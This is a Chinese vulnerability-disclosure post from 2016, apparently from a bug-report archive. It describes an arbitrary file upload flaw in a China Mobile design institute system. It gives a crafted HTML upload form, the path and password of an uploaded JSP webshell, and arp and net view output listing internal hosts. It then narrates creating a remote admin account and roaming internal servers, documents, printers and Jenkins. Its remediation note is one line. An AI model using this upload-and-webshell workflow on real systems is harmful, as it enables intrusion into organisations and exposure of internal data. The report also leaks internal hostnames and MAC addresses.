HanDs
NO.2

[7月漏洞公开] 中国移动设计院某系统存在任意文件上传漏洞导致内网漫游大量内网信息 

学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

任意文件上传

详细说明:

**.**.**.**/

QQ截图20160522135550.png本地构造上传页面

code 区域
<html>
<form action="**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000&" method="post" enctype="multipart/form-data">
<input type='file' name='file' />
<input type='hidden' name='filename' value="null" />
<input type='hidden' name='id type=' value="" />
<input type="submit" value='提 交' name="Submit"></form>
repository/000000000/wpp1.jsp
</html>

上传shell

**.**.**.**/repository/000000000/wpp1.jsp

密码:023

QQ截图20160522135646.png

漏洞证明:

QQ截图20160522135658.pngcode 区域
[*] 基本信息 [ A:C:D:E: ]

E:\Program Files\Bronzesoft2\RDM\Application\rdmapp\power\> arp -a

接口: **.**.**.** --- 0xa
Internet 地址 物理地址 类型
**.**.**.** bc-46-99-74-98-31 动态
**.**.**.** c4-54-44-8c-c4-32 动态
**.**.**.** 18-67-b0-bd-95-3a 动态
**.**.**.** c8-0a-a9-58-b9-e9 动态
**.**.**.** f0-4d-a2-c7-61-da 动态
**.**.**.** 68-f7-28-9b-1a-50 动态
**.**.**.** 00-19-21-1c-e9-e1 动态
**.**.**.** 20-89-84-d3-c5-14 动态
**.**.**.**0 f0-de-f1-e9-ce-5a 动态
**.**.**.**1 00-1f-16-1d-59-66 动态
**.**.**.**3 68-f7-28-79-c5-2b 动态
**.**.**.**4 f0-4d-a2-c7-61-da 动态
**.**.**.**5 c8-0a-a9-58-b9-e9 动态
**.**.**.**6 3c-07-54-0a-0c-e6 动态
**.**.**.**7 00-1f-16-10-a4-c0 动态
**.**.**.**8 30-85-a9-71-25-3f 动态
**.**.**.**9 5c-f9-dd-4c-be-a5 动态
**.**.**.**0 68-f7-28-9b-1a-50 动态
**.**.**.**1 76-4d-5d-b5-fb-c1 动态
**.**.**.**2 74-e6-e2-3e-69-6c 动态
**.**.**.**3 00-24-54-d2-3e-a4 动态
**.**.**.**4 20-6a-8a-05-f0-eb 动态
**.**.**.**5 14-da-e9-63-bc-20 动态
**.**.**.**6 b0-25-aa-16-e6-0c 动态
**.**.**.**7 3c-97-0e-21-54-ef 动态
**.**.**.**0 f0-de-f1-e9-ca-09 动态
**.**.**.**1 54-04-a6-77-ef-c2 动态
**.**.**.**2 a0-1d-48-fc-4b-7e 动态
**.**.**.**3 00-24-54-ff-2f-7a 动态
**.**.**.**5 3c-97-0e-16-ce-e3 动态
**.**.**.**6 bc-30-5b-cb-d7-16 动态
**.**.**.**7 2c-27-d7-c8-74-c0 动态
**.**.**.**8 3c-97-0e-16-ce-e3 动态
**.**.**.**9 24-b6-fd-0e-c4-50 动态
**.**.**.** 54-04-a6-b0-40-08 动态
**.**.**.** 68-5b-35-d5-68-6e 动态
**.**.**.** 20-6a-8a-4a-00-a9 动态
**.**.**.** f0-de-f1-e9-c9-d2 动态
**.**.**.** 00-1f-16-10-a4-c0 动态
**.**.**.** 20-6a-8a-44-aa-9f 动态
**.**.**.** bc-30-5b-cb-d7-16 动态
**.**.**.**7 f0-de-f1-e9-cb-d6 动态
**.**.**.**0 54-04-a6-b0-40-08 动态
**.**.**.**1 20-6a-8a-44-aa-9f 动态
**.**.**.**2 3c-97-0e-ae-64-f8 动态
**.**.**.**3 e4-11-5b-5a-08-31 动态
**.**.**.**4 bc-ae-c5-11-49-51 动态
**.**.**.**5 00-90-f5-f4-6d-76 动态
**.**.**.**7 00-e0-4c-36-15-01 动态
**.**.**.**8 3c-97-0e-ae-67-8c 动态
**.**.**.**9 f0-de-f1-97-07-40 动态
**.**.**.**0 00-1f-16-1d-4e-c6 动态
**.**.**.**1 04-7d-7b-a7-b3-d4 动态
**.**.**.**2 00-0c-29-5a-3e-ba 动态
**.**.**.**3 04-02-1f-58-db-0a 动态
**.**.**.**4 00-1e-90-b2-9a-f3 动态
**.**.**.**5 c4-54-44-8c-c4-32 动态
**.**.**.**6 68-f7-28-79-c5-2b 动态
**.**.**.**7 28-d2-44-86-3d-7a 动态
**.**.**.**9 a4-ba-db-c6-6e-0b 动态
**.**.**.**0 28-d2-44-86-3e-52 动态
**.**.**.**3 20-6a-8a-4a-00-a9 动态
**.**.**.**4 28-92-4a-42-bb-33 动态
**.**.**.**8 f0-de-f1-e9-cb-d6 动态
**.**.**.**2 00-03-10-09-0f-0c 动态
**.**.**.**3 24-b6-fd-0e-c4-50 动态
**.**.**.**16 00-13-72-82-ed-06 动态
**.**.**.**23 00-21-9b-31-5e-07 动态
**.**.**.**87 94-0c-6d-17-18-55 动态
**.**.**.** 00-14-22-1c-a0-4c 动态
**.**.**.** 00-18-8b-90-d3-6e 动态
**.**.**.** 00-23-ae-8d-a2-46 动态
**.**.**.** 00-0c-29-04-a3-fd 动态
**.**.**.** 00-50-56-b7-00-01 动态
**.**.**.** 00-50-56-b7-00-0d 动态
**.**.**.** 00-50-56-8e-4f-d8 动态
**.**.**.** 00-50-56-8e-57-01 动态
**.**.**.** 00-19-b9-35-97-bc 动态
**.**.**.** d4-ae-52-78-06-0f 动态
**.**.**.** 00-0c-29-cc-c0-4a 动态
**.**.**.** c0-62-6b-e2-28-40 动态
**.**.**.** 00-64-40-3b-11-40 动态
**.**.**.** 00-00-0c-07-ac-db 动态
**.**.**.** ff-ff-ff-ff-ff-ff 静态
**.**.**.** 01-00-5e-00-00-02 静态
**.**.**.** 01-00-5e-00-00-05 静态
**.**.**.**2 01-00-5e-00-00-16 静态
**.**.**.**52 01-00-5e-00-00-fc 静态
**.**.**.** 01-00-5e-7f-ff-fa 静态
**.**.**.** 01-00-5e-00-00-01 静态
**.**.**.** 01-00-5e-7f-ff-fa 静态


E:\Program Files\Bronzesoft2\RDM\Application\rdmapp\power\> net view
服务器名称 注解

-------------------------------------------------------------------------------
\\36D6C4EB20B2477
\\6GOFTIHBQUZ88VD
\\BTE_DISPLAY
\\CMTRANS_DEV4
\\CMTRANS_EXE1
\\CMTRANS_TEST1
\\DB_DEVELOP
\\DB_DISPLAY
\\DEV184
\\DEV186
\\DEVDB188 testdb178
\\FTP123
\\GPDI-0PT-GIS9
\\GPDI-7BD0A8D4CD
\\GPDI-891A7765EF
\\GPDI-C2A1697A13
\\GPDI-JIRA
\\GPDI-OPT-DB
\\GPDI-OPT-GIS10
\\GPDI-STU6IKT7
\\HLJTESTDB166
\\ICT-APP-TEST ICT-APP-TEST
\\ICT-DB-DEV ICT-DB-DEV
\\ICT-FILE-SERVER ICT-FILE-SERVER
\\ICT-JIRA ICT-JIRA
\\INBUILDCOVER_DE
\\INFO-EB27663991
\\MAP141
\\NRPT-DEV
\\OPT-DELAY-DEV
\\OPT-INFOCADREG
\\OPT-MYSQLDB
\\PINGSHAN
\\PLATFORM-SERVER
\\RESOURCE129
\\TEST174
\\TEST176
\\TESTDB178 testdb178
\\TRANSPDA
\\WIN-3UB6DGFEI5H
\\WIN-8E4MVQIM51D
\\WIN-C89I4PETNUD
\\WIN-CDSIEMS8E6L
\\WIN-R1EOGAPCOBC
命令成功完成。E:\Program Files\Bronzesoft2\RDM\Application\rdmapp\power\>QQ截图20160522135735.png新建管理远程服务器

[email protected]

QQ截图20160522135850.png大量内部文档资料

QQ截图20160522140031.pngQQ截图20160522140142.png文件仍在更新

QQ截图20160522140439.png端口映射

QQ截图20160522140538.png简单漫游一下

QQ截图20160522141844.png越来越多奇怪的网站

QQ截图20160522142503.png打印机也来了

QQ截图20160522143650.png又是一台

QQ截图20160522144116.png我要不要恶搞一下

QQ截图20160522144200.png又来一台

QQ截图20160522144333.png公安厅的神马文件

QQ截图20160522144432.pngjenkins

QQ截图20160522145032.png到此为止吧

修复方案:

删除shell,删除帐号,补丁


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国移动 设计院 系统 存在 任意 文件 上传 漏洞 导致 漫游 大量 网信息
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组